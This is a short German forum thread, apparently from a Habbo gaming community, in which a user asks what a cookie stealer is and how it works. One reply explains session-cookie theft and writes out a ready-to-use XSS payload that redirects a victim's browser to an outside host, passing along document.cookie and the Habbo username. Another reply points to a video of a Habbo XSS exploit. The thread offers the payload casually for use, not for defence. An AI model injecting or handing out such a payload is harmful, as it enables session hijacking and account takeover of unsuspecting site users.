Also meine frage lautet was ist ein Cookie Stealer und wie funkioniert es?
Was ist ein Cookie Stealer?
-
-
/ verschoben zu Fragen & Probleme
Bitte künftig beachten ;). -
Ein Cookiestealer klaut deine Cookies. Darin stehen deine PHP-SessionID und weiteres.
Die Funktionsweise ist ganz einfach.
Du injectest ein Script auf eine Webseite, wie z.b.
<script>document.location="http://hubbahotel.eu/xss/c.php?c=" + document.cookie + "&u=" + habboName </script>
dieses.
Dieses leitet dich mit dem Cookie an ein PHP-Script weiter, welches alles ausliest und in eine Datei schreibt.
Das PHP-Script werde ich jetzt nicht posten
Das ganze wird dann als XSS (Cross-Site-Scripting) bezeichnet, da es dich zu dem Script schickt und (manchmal) wieder zurück.
-
Cookies kann man via. ne XSS klauen hui
-
Wie's funktioniert wei߸t du nun also, hier hast du ein Video wo es Tunny mit Habbo macht:
Habbo XSS Exploit
- YouTubeViel Fun.
-
Das Video ist richtig alt und die XSS wurde längst gefixxt lol.
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!